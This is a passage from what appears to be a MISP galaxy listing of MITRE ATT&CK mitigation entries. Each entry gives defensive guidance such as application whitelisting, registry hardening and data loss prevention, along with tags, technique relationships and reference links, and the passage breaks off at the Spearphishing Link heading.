mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Address Translation Traversal - T1599.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"

Table 4229. Table References
Links
https://attack.mitre.org/mitigations/M1037

Logon Scripts Mitigation - T1037

Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating Credential Access techniques and limiting account access and permissions of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Logon Scripts Mitigation - T1037"

View relationships graph

Logon Scripts Mitigation - T1037 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"

Table 4230. Table References
Links
https://attack.mitre.org/mitigations/T1037
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Environment Variable Permissions - M1039

Prevent modification of environment variables by unauthorized users and groups.

The tag is: misp-galaxy:mitre-course-of-action="Environment Variable Permissions - M1039"

View relationships graph

Environment Variable Permissions - M1039 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"

Table 4231. Table References
Links
https://attack.mitre.org/mitigations/M1039

Process Hollowing Mitigation - T1093

Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Hollowing Mitigation - T1093"

View relationships graph

Process Hollowing Mitigation - T1093 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093" with estimative-language:likelihood-probability="almost-certain"

Table 4232. Table References
Links
https://attack.mitre.org/mitigations/T1093
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Restrict Library Loading - M1044

Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Library Loading - M1044"

View relationships graph

Restrict Library Loading - M1044 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1177" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"

Table 4233. Table References
Links
https://attack.mitre.org/mitigations/M1044

Indicator Blocking Mitigation - T1054

Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls. Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.

The tag is: misp-galaxy:mitre-course-of-action="Indicator Blocking Mitigation - T1054"

View relationships graph

Indicator Blocking Mitigation - T1054 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054" with estimative-language:likelihood-probability="almost-certain"

Table 4234. Table References
Links
https://attack.mitre.org/mitigations/T1054
https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal

Software Packing Mitigation - T1045

Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.

Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Software Packing Mitigation - T1045"

View relationships graph

Software Packing Mitigation - T1045 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 4235. Table References
Links
https://attack.mitre.org/mitigations/T1045
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Staged Mitigation - T1074

Identify system utilities, remote access or third-party tools, users or potentially malicious software that may be used to store compressed or encrypted data in a publicly writeable directory, central location, or commonly used staging directories (e.g. recycle bin) that is indicative of non-standard behavior, and audit and/or block them by using file integrity monitoring tools where appropriate. Consider applying data size limits or blocking file writes of common compression and encryption utilities such as 7zip, RAR, ZIP, or zlib on frequently used staging directories or central locations and monitor attempted violations of those restrictions.

The tag is: misp-galaxy:mitre-course-of-action="Data Staged Mitigation - T1074"

View relationships graph

Data Staged Mitigation - T1074 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 4236. Table References
Links
https://attack.mitre.org/mitigations/T1074

Environmental Keying Mitigation - T1480

This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.

The tag is: misp-galaxy:mitre-course-of-action="Environmental Keying Mitigation - T1480"

View relationships graph

Environmental Keying Mitigation - T1480 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"

Table 4237. Table References
Links
https://attack.mitre.org/mitigations/T1480

Do Not Mitigate - M1055

This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.

The tag is: misp-galaxy:mitre-course-of-action="Do Not Mitigate - M1055"

View relationships graph

Do Not Mitigate - M1055 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001" with estimative-language:likelihood-probability="almost-certain"

Table 4238. Table References
Links
https://attack.mitre.org/mitigations/M1055

Data Loss Prevention - M1057

Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)

The tag is: misp-galaxy:mitre-course-of-action="Data Loss Prevention - M1057"

View relationships graph

Data Loss Prevention - M1057 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Physical Medium - T1052" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

Table 4239. Table References
Links
https://attack.mitre.org/mitigations/M1057
https://purplesec.us/data-loss-prevention/

Process Discovery Mitigation - T1057

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Discovery Mitigation - T1057"

View relationships graph

Process Discovery Mitigation - T1057 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 4240. Table References
Links
https://attack.mitre.org/mitigations/T1057
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Account Discovery Mitigation - T1087

Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located <code>HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators</code>. It can be disabled through GPO: Computer Configuration > [Policies] > Administrative Templates > Windows Components > Credential User Interface: E numerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Account Discovery Mitigation - T1087"

View relationships graph

Account Discovery Mitigation - T1087 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 4241. Table References
Links
https://attack.mitre.org/mitigations/T1087
https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Valid Accounts Mitigation - T1078

Take measures to detect or prevent techniques such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems.

Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized.

Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured.

The tag is: misp-galaxy:mitre-course-of-action="Valid Accounts Mitigation - T1078"

View relationships graph

Valid Accounts Mitigation - T1078 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 4242. Table References
Links
https://attack.mitre.org/mitigations/T1078
https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach
https://technet.microsoft.com/en-us/library/dn535501.aspx
https://technet.microsoft.com/en-us/library/dn487450.aspx
https://www.us-cert.gov/ncas/alerts/TA13-175A

Multilayer Encryption Mitigation - T1079

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multilayer Encryption Mitigation - T1079"

View relationships graph

Multilayer Encryption Mitigation - T1079 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079" with estimative-language:likelihood-probability="almost-certain"

Table 4243. Table References
Links
https://attack.mitre.org/mitigations/T1079
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Modify Registry Mitigation - T1112

Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Modify Registry Mitigation - T1112"

View relationships graph

Modify Registry Mitigation - T1112 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 4244. Table References
Links
https://attack.mitre.org/mitigations/T1112
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Authentication Package Mitigation - T1131

Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Authentication Package Mitigation - T1131"

View relationships graph

Authentication Package Mitigation - T1131 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131" with estimative-language:likelihood-probability="almost-certain"

Table 4245. Table References
Links
https://attack.mitre.org/mitigations/T1131
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://technet.microsoft.com/en-us/library/dn408187.aspx

Screen Capture Mitigation - T1113

Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Screen Capture Mitigation - T1113"

View relationships graph

Screen Capture Mitigation - T1113 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 4246. Table References
Links
https://attack.mitre.org/mitigations/T1113
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Email Collection Mitigation - T1114

Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.

Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.

Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Email Collection Mitigation - T1114"

View relationships graph

Email Collection Mitigation - T1114 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 4247. Table References
Links
https://attack.mitre.org/mitigations/T1114
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Input Prompt Mitigation - T1141

This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).

The tag is: misp-galaxy:mitre-course-of-action="Input Prompt Mitigation - T1141"

View relationships graph

Input Prompt Mitigation - T1141 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141" with estimative-language:likelihood-probability="almost-certain"

Table 4248. Table References
Links
https://attack.mitre.org/mitigations/T1141

Clipboard Data Mitigation - T1115

Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Clipboard Data Mitigation - T1115"

View relationships graph

Clipboard Data Mitigation - T1115 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 4249. Table References
Links
https://attack.mitre.org/mitigations/T1115
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

LC_LOAD_DYLIB Addition Mitigation - T1161

Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn’t included as part of an update, it should be investigated.

The tag is: misp-galaxy:mitre-course-of-action="LC_LOAD_DYLIB Addition Mitigation - T1161"

View relationships graph

LC_LOAD_DYLIB Addition Mitigation - T1161 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"

Table 4250. Table References
Links
https://attack.mitre.org/mitigations/T1161

Code Signing Mitigation - T1116

Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)

The tag is: misp-galaxy:mitre-course-of-action="Code Signing Mitigation - T1116"

View relationships graph

Code Signing Mitigation - T1116 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 4251. Table References
Links
https://attack.mitre.org/mitigations/T1116
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
https://technet.microsoft.com/en-us/library/cc733026.aspx
https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

Automated Collection Mitigation - T1119

Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means. A keylogger installed on a system may be able to intercept passwords through [Input Capture](https://attack.mitre.org/techniques/T1056) and be used to decrypt protected documents that an adversary may have collected. Strong passwords should be used to prevent offline cracking of encrypted documents through [Brute Force](https://attack.mitre.org/techniques/T1110) techniques.

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to collect files and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Automated Collection Mitigation - T1119"

View relationships graph

Automated Collection Mitigation - T1119 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

Table 4252. Table References
Links
https://attack.mitre.org/mitigations/T1119
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Template Injection Mitigation - T1221

Consider disabling Microsoft Office macros/active content to prevent the execution of malicious payloads in documents (Citation: Microsoft Disable Macros), though this setting may not mitigate the [Forced Authentication](https://attack.mitre.org/techniques/T1187) use for this technique.

Because this technique involves user interaction on the endpoint, it’s difficult to fully mitigate. However, there are potential mitigations including training users to identify social engineering techniques and spearphishing emails. Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads. (Citation: Anomali Template Injection MAR 2018)

The tag is: misp-galaxy:mitre-course-of-action="Template Injection Mitigation - T1221"

View relationships graph

Template Injection Mitigation - T1221 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

Table 4253. Table References
Links
https://attack.mitre.org/mitigations/T1221
https://support.office.com/article/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6
https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104

Audio Capture Mitigation - T1123

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to record audio by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Audio Capture Mitigation - T1123"

View relationships graph

Audio Capture Mitigation - T1123 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 4254. Table References
Links
https://attack.mitre.org/mitigations/T1123
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Encoding Mitigation - T1132

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Encoding Mitigation - T1132"

View relationships graph

Data Encoding Mitigation - T1132 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

Table 4255. Table References
Links
https://attack.mitre.org/mitigations/T1132
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Video Capture Mitigation - T1125

Mitigating this technique specifically may be difficult as it requires fine-grained API control. Efforts should be focused on preventing unwanted or unknown code from executing on a system.

Identify and block potentially malicious software that may be used to capture video and images by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Video Capture Mitigation - T1125"

View relationships graph

Video Capture Mitigation - T1125 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

Table 4256. Table References
Links
https://attack.mitre.org/mitigations/T1125
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Login Item Mitigation - T1162

Restrict users from being able to create their own login items. Additionally, holding the shift key during login prevents apps from opening automatically (Citation: Re-Open windows on Mac).

The tag is: misp-galaxy:mitre-course-of-action="Login Item Mitigation - T1162"

View relationships graph

mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"

Table 4257. Table References
Links
https://attack.mitre.org/mitigations/T1162
https://support.apple.com/en-us/HT204005

Domain Fronting Mitigation - T1172

If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be Domain Fronting.

In order to use domain fronting, attackers will likely need to deploy additional tools to compromised systems. (Citation: FireEye APT29 Domain Fronting With TOR March 2017) (Citation: Mandiant No Easy Breach) It may be possible to detect or prevent the installation of these tools with Host-based solutions.

The tag is: misp-galaxy:mitre-course-of-action="Domain Fronting Mitigation - T1172"

View relationships graph

Domain Fronting Mitigation - T1172 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172" with estimative-language:likelihood-probability="almost-certain"

Table 4258. Table References
Links
https://attack.mitre.org/mitigations/T1172
https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016

AppCert DLLs Mitigation - T1182

Identify and block potentially malicious software that may be executed through AppCert DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppCert DLLs Mitigation - T1182"

View relationships graph

AppCert DLLs Mitigation - T1182 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182" with estimative-language:likelihood-probability="almost-certain"

Table 4259. Table References
Links
https://attack.mitre.org/mitigations/T1182
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Spearphishing Link Mitigation - T1192

